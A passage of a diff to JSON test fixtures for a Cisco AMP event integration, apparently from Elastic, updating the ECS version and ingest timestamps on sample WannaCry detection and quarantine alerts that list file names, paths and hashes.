"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2783,7 +2783,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2803,7 +2803,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843617007Z", + "ingested": "2021-09-13T18:07:04.510392045Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2858,7 +2858,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2878,7 +2878,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843618896Z", + "ingested": "2021-09-13T18:07:04.510393933Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -2933,7 +2933,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2953,7 +2953,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843620759Z", + "ingested": "2021-09-13T18:07:04.510395806Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3008,7 +3008,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3028,7 +3028,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843622635Z", + "ingested": "2021-09-13T18:07:04.510397685Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3096,7 +3096,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3128,7 +3128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843624521Z", + "ingested": "2021-09-13T18:07:04.510399559Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3198,7 +3198,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3230,7 +3230,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843639044Z", + "ingested": "2021-09-13T18:07:04.510401442Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3287,7 +3287,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3307,7 +3307,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843642931Z", + "ingested": "2021-09-13T18:07:04.510403305Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3358,7 +3358,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3378,7 +3378,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843644903Z", + "ingested": "2021-09-13T18:07:04.510405200Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3433,7 +3433,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3465,7 +3465,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843646784Z", + "ingested": "2021-09-13T18:07:04.510407053Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3522,7 +3522,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3554,7 +3554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843648712Z", + "ingested": "2021-09-13T18:07:04.510408937Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3618,7 +3618,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3650,7 +3650,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843650655Z", + "ingested": "2021-09-13T18:07:04.510410809Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3718,7 +3718,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3750,7 +3750,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843652586Z", + "ingested": "2021-09-13T18:07:04.510412707Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3809,7 +3809,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3839,7 +3839,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843654448Z", + "ingested": "2021-09-13T18:07:04.510414604Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3894,7 +3894,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3924,7 +3924,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843656334Z", + "ingested": "2021-09-13T18:07:04.510416464Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3990,7 +3990,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4022,7 +4022,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843658227Z", + "ingested": "2021-09-13T18:07:04.510418340Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 